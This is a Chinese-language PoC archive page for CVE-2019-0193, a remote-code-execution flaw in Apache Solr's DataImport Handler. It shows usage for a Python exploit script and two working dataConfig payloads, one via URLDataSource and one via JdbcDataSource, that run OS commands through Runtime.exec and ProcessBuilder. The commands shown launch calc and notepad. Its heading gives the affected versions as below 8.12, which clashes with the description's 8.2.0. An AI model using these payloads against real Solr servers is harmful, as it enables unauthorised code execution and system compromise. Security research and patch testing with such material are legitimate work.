关联漏洞
标题:
Apache Solr 代码注入漏洞
(CVE-2019-0193)
描述:Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 Apache Solr 8.2.0之前版本中存在代码注入漏洞。攻击者可利用该漏洞在目标服务器上执行恶意代码。
描述
Apache Solr DataImport Handler RCE
介绍
# CVE-2019-0193 Solr DataImport Handler RCE (RCE-Vuln < solr v8.12)


### python usage
`python CVE-2019-0193.py http://192.168.2.18:8983 "calc"`
### URLDataSource_Poc

```
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(){ java.lang.Runtime.getRuntime().exec("calc");
}
]]></script>
<document>
<entity name="stackoverflow"
url="https://stackoverflow.com/feeds/tag/solr"
processor="XPathEntityProcessor"
forEach="/feed"
transformer="script:poc" />
</document>
</dataConfig>
```
### jdbc

`D:\CVE\CVE-2019-0193\solr-7.7.2\server\solr-webapp\webapp\WEB-INF\lib\mysql-connector-java-5.1.48.jar`
```
<dataConfig>
<dataSource name="fromMysql"
type="JdbcDataSource"
driver="com.mysql.jdbc.Driver"
url="jdbc:mysql://localhost:3306/mysql"
user="root"
password="jas502n"/>
<script ><![CDATA[
function poc(row) {
var x=new java.lang.ProcessBuilder;x.command("notepad",'1.txt');org.apache.commons.io.IOUtils.toString(x.start().getInputStream());
return row;
}
]]>
</script>
<document>
<entity name="Jas502n" transformer="script:poc" query="SELECT 1">
</entity>
</document>
</dataConfig>
```
### 参考链接:
https://mp.weixin.qq.com/s/typLOXZCev_9WH_Ux0s6oA
https://mp.weixin.qq.com/s/diF7HOf3wuSjBeoIb7qLCA
文件快照
[4.0K] /data/pocs/7d46f63687f39b21a702dcc14d426847d66dfbda
├── [6.3M] CVE-2019-0193-Demo.mp4
├── [687K] CVE-2019-0193.jpg
├── [4.1K] CVE-2019-0193.py
├── [557K] python-CVE-2019-0193.jpg
├── [649K] python-CVE-2019-0193-poc.jpg
├── [1.5K] README.md
└── [2.2M] solr_RCE.gif
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。